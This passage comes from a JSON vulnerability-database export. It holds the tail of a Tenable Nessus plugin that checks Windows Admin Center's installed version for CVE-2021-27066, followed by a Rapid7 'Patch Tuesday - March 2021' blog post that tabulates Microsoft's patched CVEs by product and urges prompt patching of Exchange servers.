script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-27066\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/03/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/03/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/03/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:windows_admin_center\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"windows_admin_center_installed.nbin\");\n script_require_keys(\"installed_sw/Windows Admin Center\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\napp = 'Windows Admin Center';\napp_info = vcf::get_app_info(app:app, win_local:TRUE);\n\nconstraints = [\n { 'fixed_version' : '1.3.2103.1006' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING);\n", "naslFamily": "Windows", "cpe": ["cpe:/a:microsoft:windows_admin_center"], "solution": "Apply the appropriate update referenced in the Microsoft advisory.", "nessusSeverity": "Medium", "cvssScoreSource": "CVE-2021-27066", "vpr": {"risk factor": "Low", "score": "1.4"}, "exploitAvailable": false, "exploitEase": "No known exploits are available", "patchPublicationDate": "2021-03-02T00:00:00", "vulnerabilityPublicationDate": "2021-03-09T00:00:00", "exploitableWith": [], "_object_type": "robots.models.nessus.NessusBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.nessus.NessusBulletin"]}], "rapid7blog": [{"id": "RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53", "hash": "852f2b1347f66df9cb401ee181f8e70d", "type": "rapid7blog", "bulletinFamily": "info", "title": "Patch Tuesday - March 2021", "description": "\n\nAnother Patch Tuesday ([2021-Mar](<https://msrc.microsoft.com/update-guide/releaseNote/2021-Mar>)) is upon us and with this month comes a whopping 122 CVEs. As usual Windows tops the list of the most patched product. However, this month it\u2019s browser vulnerabilities taking the second place, outnumbering Office vulnerabilities 3:1! Lastly, the Exchange Server vulnerabilities this month are not to be ignored as more than half of them have been seen exploited in the wild.\n\n### Vulnerability Breakdown by Software Family\n\nFamily | Vulnerability Count \n---|--- \nWindows | 59 \nBrowser | 35 \nESU | 24 \nMicrosoft Office | 11 \nExchange Server | 7 \nDeveloper Tools | 6 \nAzure | 3 \nSQL Server | 1 \n \n## [Exchange Server Vulnerabilities](<https://support.microsoft.com/en-us/topic/description-of-the-security-update-for-microsoft-exchange-server-2019-2016-and-2013-march-2-2021-kb5000871-9800a6bb-0a21-4ee7-b9da-fa85b3e1d23b>)\n\nEarlier this month Microsoft [released out of band updates for Exchange Server](<https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server>). These critical updates fixed a number of publicly exploited vulnerabilities, but not before attackers were able to compromise over 30,000 internet facing instances. \n\nYesterday, Microsoft issued an [additional set of patches](<https://msrc-blog.microsoft.com/2021/03/05/microsoft-exchange-server-vulnerabilities-mitigations-march-2021/>) for older, unsupported versions of Exchange Server. This allows customers who have not been able to update to the most recent version of Exchange the ability to defend against these widespread exploit attempts.\n\nIf you administer an Exchange Server,** stop reading this blog and go patch these systems!** For more information [please see our blog post on the topic](<https://blog.rapid7.com/2021/03/03/mass-exploitation-of-exchange-server-zero-day-cves-what-you-need-to-know/>).\n\n## Patch those Windows systems!\n\nAlmost half of the newly announced vulnerabilities this month affect components of Windows itself. Some major highlights include:\n\n * Multiple high severity RCE vulnerabilities in Windows DNS Server \n([CVE-2021-26877](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26877>), [CVE-2021-26893](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26893>), [CVE-2021-26894](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26894>), [CVE-2021-26895](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26895>), and [CVE-2021-26897](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26897>))\n * Remote Code Execution in Hyper-V ([CVE-2021-26867](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26867>)) enabling virtual machine escape (CVSSv3 9.9)\n\n## Browser Vulnerabilities\n\nSince going end-of-life in November 2020, we haven't seen any Internet Explorer patches from Microsoft. However, this month Microsoft has made two new updates available: [CVE-2021-27085](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27085>) and [CVE-2021-26411](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26411>). CVE-2021-26411 has been exploited in the wild, so don't delay applying patches if IE is still in your environment.\n\nThe majority of the browser vulnerabilities announced this month affect Microsoft Edge on Chromium. These patches are courtesy of vulnerabilities being fixed upstream in the Chromium project.\n\n## Summary Tables\n\nHere are this month's patched vulnerabilities split by the product family.\n\n## Azure Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-27075](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27075>) | Azure Virtual Machine Information Disclosure Vulnerability | No | No | 6.8 | Yes \n[CVE-2021-27080](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27080>) | Azure Sphere Unsigned Code Execution Vulnerability | No | No | 9.3 | Yes \n[CVE-2021-27074](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27074>) | Azure Sphere Unsigned Code Execution Vulnerability | No | No | 6.2 | Yes \n \n## Browser Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-27085](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27085>) | Internet Explorer Remote Code Execution Vulnerability | No | No | 8.8 | No \n[CVE-2021-21190](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21190>) | Chromium CVE-2021-21190 : Uninitialized Use in PDFium | No | No | N/A | Yes \n[CVE-2021-21189](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21189>) | Chromium CVE-2021-21189: Insufficient policy enforcement in payments | No | No | N/A | Yes \n[CVE-2021-21188](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21188>) | Chromium CVE-2021-21188: Use after free in Blink | No | No | N/A | Yes \n[CVE-2021-21187](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21187>) | Chromium CVE-2021-21187: Insufficient data validation in URL formatting | No | No | N/A | Yes \n[CVE-2021-21186](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21186>) | Chromium CVE-2021-21186: Insufficient policy enforcement in QR scanning | No | No | N/A | Yes \n[CVE-2021-21185](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21185>) | Chromium CVE-2021-21185: Insufficient policy enforcement in extensions | No | No | N/A | Yes \n[CVE-2021-21184](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21184>) | Chromium CVE-2021-21184: Inappropriate implementation in performance APIs | No | No | N/A | Yes \n[CVE-2021-21183](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21183>) | Chromium CVE-2021-21183: Inappropriate implementation in performance APIs | No | No | N/A | Yes \n[CVE-2021-21182](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21182>) | Chromium CVE-2021-21182: Insufficient policy enforcement in navigations | No | No | N/A | Yes \n[CVE-2021-21181](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21181>) | Chromium CVE-2021-21181: Side-channel information leakage in autofill | No | No | N/A | Yes \n[CVE-2021-21180](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21180>) | Chromium CVE-2021-21180: Use after free in tab search | No | No | N/A | Yes \n[CVE-2021-21179](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21179>) | Chromium CVE-2021-21179: Use after free in Network Internals | No | No | N/A | Yes \n[CVE-2021-21178](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21178>) | Chromium CVE-2021-21178 : Inappropriate implementation in Compositing | No | No | N/A | Yes \n[CVE-2021-21177](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21177>) | Chromium CVE-2021-21177: Insufficient policy enforcement in Autofill | No | No | N/A | Yes \n[CVE-2021-21176](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21176>) | Chromium CVE-2021-21176: Inappropriate implementation in full screen mode | No | No | N/A | Yes \n[CVE-2021-21175](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21175>) | Chromium CVE-2021-21175: Inappropriate implementation in Site isolation | No | No | N/A | Yes \n[CVE-2021-21174](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21174>) | Chromium CVE-2021-21174: Inappropriate implementation in Referrer | No | No | N/A | Yes \n[CVE-2021-21173](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21173>) | Chromium CVE-2021-21173: Side-channel information leakage in Network Internals | No | No | N/A | Yes \n[CVE-2021-21172](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21172>) | Chromium CVE-2021-21172: Insufficient policy enforcement in File System API | No | No | N/A | Yes \n[CVE-2021-21171](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21171>) | Chromium CVE-2021-21171: Incorrect security UI in TabStrip and Navigation | No | No | N/A | Yes \n[CVE-2021-21170](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21170>) | Chromium CVE-2021-21170: Incorrect security UI in Loader | No | No | N/A | Yes \n[CVE-2021-21169](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21169>) | Chromium CVE-2021-21169: Out of bounds memory access in V8 | No | No | N/A | Yes \n[CVE-2021-21168](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21168>) | Chromium CVE-2021-21168: Insufficient policy enforcement in appcache | No | No | N/A | Yes \n[CVE-2021-21167](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21167>) | Chromium CVE-2021-21167: Use after free in bookmarks | No | No | N/A | Yes \n[CVE-2021-21166](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21166>) | Chromium CVE-2021-21166: Object lifecycle issue in audio | No | No | N/A | Yes \n[CVE-2021-21165](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21165>) | Chromium CVE-2021-21165: Object lifecycle issue in audio | No | No | N/A | Yes \n[CVE-2021-21164](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21164>) | Chromium CVE-2021-21164: Insufficient data validation in Chrome for iOS | No | No | N/A | Yes \n[CVE-2021-21163](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21163>) | Chromium CVE-2021-21163: Insufficient data validation in Reader Mode | No | No | N/A | Yes \n[CVE-2021-21162](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21162>) | Chromium CVE-2021-21162: Use after free in WebRTC | No | No | N/A | Yes \n[CVE-2021-21161](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21161>) | Chromium CVE-2021-21161: Heap buffer overflow in TabStrip | No | No | N/A | Yes \n[CVE-2021-21160](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21160>) | Chromium CVE-2021-21160: Heap buffer overflow in WebAudio | No | No | N/A | Yes \n[CVE-2021-21159](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21159>) | Chromium CVE-2021-21159: Heap buffer overflow in TabStrip | No | No | N/A | Yes \n[CVE-2020-27844](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-27844>) | Chromium CVE-2020-27844: Heap buffer overflow in OpenJPEG | No | No | N/A | Yes \n \n## Browser ESU Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-26411](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26411>) | Internet Explorer Memory Corruption Vulnerability | Yes | Yes | 8.8 | Yes \n \n## Developer Tools Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-27060](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27060>) | Visual Studio Code Remote Code Execution Vulnerability | No | No | 7.8 | No \n[CVE-2021-27084](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27084>) | Visual Studio Code Java Extension Pack Remote Code Execution Vulnerability | No | No | N/A | No \n[CVE-2021-27081](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27081>) | Visual Studio Code ESLint Extension Remote Code Execution Vulnerability | No | No | 7.8 | No \n[CVE-2021-27083](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27083>) | Remote Development Extension for Visual Studio Code Remote Code Execution Vulnerability | No | No | 7.8 | No \n[CVE-2021-27082](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27082>) | Quantum Development Kit for Visual Studio Code Remote Code Execution Vulnerability | No | No | 7.8 | No \n[CVE-2021-21300](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21300>) | Git for Visual Studio Remote Code Execution Vulnerability | No | No | 8.8 | No \n \n## Exchange Server Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-26412](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26412>) | Microsoft Exchange Server Remote Code Execution Vulnerability | No | No | 9.1 | No \n[CVE-2021-26855](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26855>) | Microsoft Exchange Server Remote Code Execution Vulnerability | Yes | No | 9.1 | Yes \n[CVE-2021-27078](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27078>) | Microsoft Exchange Server Remote Code Execution Vulnerability | No | No | 9.1 | No \n[CVE-2021-26857](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26857>) | Microsoft Exchange Server Remote Code Execution Vulnerability | Yes | No | 7.8 | Yes \n[CVE-2021-27065](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27065>) | Microsoft Exchange Server Remote Code Execution Vulnerability | Yes | No | 7.8 | Yes \n[CVE-2021-26858](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26858>) | Microsoft Exchange Server Remote Code Execution Vulnerability | Yes | No | 7.8 | Yes \n[CVE-2021-26854](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26854>) | Microsoft Exchange Server Remote Code Execution Vulnerability | No | No | 6.6 | No \n \n## Microsoft Office Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-27055](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27055>) | Microsoft Visio Security Feature Bypass Vulnerability | No | No | 7 | Yes \n[CVE-2021-24104](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24104>) | Microsoft SharePoint Spoofing Vulnerability | No | No | 4.6 | Yes \n[CVE-2021-27076](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27076>) | Microsoft SharePoint Server Remote Code Execution Vulnerability | No | No | 8.8 | Yes \n[CVE-2021-27052](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27052>) | Microsoft SharePoint Server Information Disclosure Vulnerability | No | No | 5.3 | Yes \n[CVE-2021-27056](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27056>) | Microsoft PowerPoint Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-24108](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24108>) | Microsoft Office Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-27057](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27057>) | Microsoft Office Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-27059](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27059>) | Microsoft Office Remote Code Execution Vulnerability | No | No | 7.6 | Yes \n[CVE-2021-27058](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27058>) | Microsoft Office ClickToRun Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-27053](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27053>) | Microsoft Excel Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-27054](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27054>) | Microsoft Excel Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n \n## SQL Server Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-26859](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26859>) | Microsoft Power BI Information Disclosure Vulnerability | No | No | 7.7 | Yes \n \n## Windows Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-26900](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26900>) | Windows Win32k Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-26863](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26863>) | Windows Win32k Elevation of Privilege Vulnerability | No | No | 7 | No \n[CVE-2021-26871](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26871>) | Windows WalletService Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-26885](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26885>) | Windows WalletService Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-26864](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26864>) | Windows Virtual Registry Provider Elevation of Privilege Vulnerability | No | No | 8.4 | No \n[CVE-2021-1729](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1729>) | Windows Update Stack Setup Elevation of Privilege Vulnerability | No | No | 7.1 | No \n[CVE-2021-26889](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26889>) | Windows Update Stack Elevation of Privilege Vulnerability | No | No | 7.1 | No \n[CVE-2021-26866](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26866>) | Windows Update Service Elevation of Privilege Vulnerability | No | No | 7.1 | No \n[CVE-2021-26870](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26870>) | Windows Projected File System Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-26874](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26874>) | Windows Overlay Filter Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-26879](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26879>) | Windows NAT Denial of Service Vulnerability | No | No | 7.5 | No \n[CVE-2021-26884](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26884>) | Windows Media Photo Codec Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-26867](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26867>) | Windows Hyper-V Remote Code Execution Vulnerability | No | No | 9.9 | Yes \n[CVE-2021-26868](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26868>) | Windows Graphics Component Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-26892](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26892>) | Windows Extensible Firmware Interface Security Feature Bypass Vulnerability | No | No | 6.2 | No \n[CVE-2021-24090](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24090>) | Windows Error Reporting Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-26865](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26865>) | Windows Container Execution Agent Elevation of Privilege Vulnerability | No | No | 8.8 | No \n[CVE-2021-26891](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26891>) | Windows Container Execution Agent Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-26860](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26860>) | Windows App-V Overlay Filter Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-27066](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27066>) | Windows Admin Center Security Feature Bypass Vulnerability | No | No | 4.3 | No \n[CVE-2021-27070](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27070>) | Windows 10 Update Assistant Elevation of Privilege Vulnerability | No | No | 7.3 | No \n[CVE-2021-26886](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26886>) | User Profile Service Denial of Service Vulnerability | No | No | 5.5 | No \n[CVE-2021-26880](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26880>) | Storage Spaces Controller Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-26876](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26876>) | OpenType Font Parsing Remote Code Execution Vulnerability | No | No | 8.8 | No \n[CVE-2021-24089](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24089>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-26902](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26902>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-27061](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27061>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-24110](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24110>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-27047](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27047>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-27048](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27048>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-27049](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27049>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-27050](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27050>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-27051](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27051>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-27062](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27062>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-24095](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24095>) | DirectX Elevation of Privilege Vulnerability | No | No | 7 | No \n[CVE-2021-26890](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26890>) | Application Virtualization Remote Code Execution Vulnerability | No | No | 7.8 | No \n \n## Windows ESU Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-27077](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27077>) | Windows Win32k Elevation of Privilege Vulnerability | No | Yes | 7.8 | No \n[CVE-2021-26875](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26875>) | Windows Win32k Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-26873](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26873>) | Windows User Profile Service Elevation of Privilege Vulnerability | No | No | 7 | No \n[CVE-2021-26899](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26899>) | Windows UPnP Device Host Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-1640](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1640>) | Windows Print Spooler Elevation of Privilege Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-26878](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26878>) | Windows Print Spooler Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-26862](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26862>) | Windows Installer Elevation of Privilege Vulnerability | No | No | 6.3 | No \n[CVE-2021-26861](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26861>) | Windows Graphics Component Remote Code Execution Vulnerability | No | No | 7.8 | No \n[CVE-2021-24107](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24107>) | Windows Event Tracing Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-26872](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26872>) | Windows Event Tracing Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-26898](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26898>) | Windows Event Tracing Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-26901](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26901>) | Windows Event Tracing Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-26897](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26897>) | Windows DNS Server Remote Code Execution Vulnerability | No | No | 9.8 | Yes \n[CVE-2021-26877](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26877>) | Windows DNS Server Remote Code Execution Vulnerability | No | No | 9.8 | Yes \n[CVE-2021-26893](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26893>) | Windows DNS Server Remote Code Execution Vulnerability | No | No | 9.8 | Yes \n[CVE-2021-26894](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26894>) | Windows DNS Server Remote Code Execution Vulnerability | No | No | 9.8 | Yes \n[CVE-2021-26895](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26895>) | Windows DNS Server Remote Code Execution Vulnerability | No | No | 9.8 | Yes \n[CVE-2021-26896](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26896>) | Windows DNS Server Denial of Service Vulnerability | No | No | 7.5 | Yes \n[CVE-2021-27063](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27063>) | Windows DNS Server Denial of Service Vulnerability | No | No | 7.5 | Yes \n[CVE-2021-26869](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26869>) | Windows ActiveX Installer Service Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-26882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26882>) | Remote Access API Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-26881](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26881>) | Microsoft Windows Media Foundation Remote Code Execution Vulnerability | No | No | 7.5 | No \n[CVE-2021-26887](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26887>) | Microsoft Windows Folder Redirection Elevation of Privilege Vulnerability | No | No | 7.8 | Yes \n \n## Summary Graphs\n\n", "published": "2021-03-09T22:13:03", "modified": "2021-03-09T22:13:03", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "href": "https://blog.rapid7.com/2021/03/09/patch-tuesday-march-2021/", "reporter": "Adam Bunn", "references": [], "cvelist": ["CVE-2020-27844", 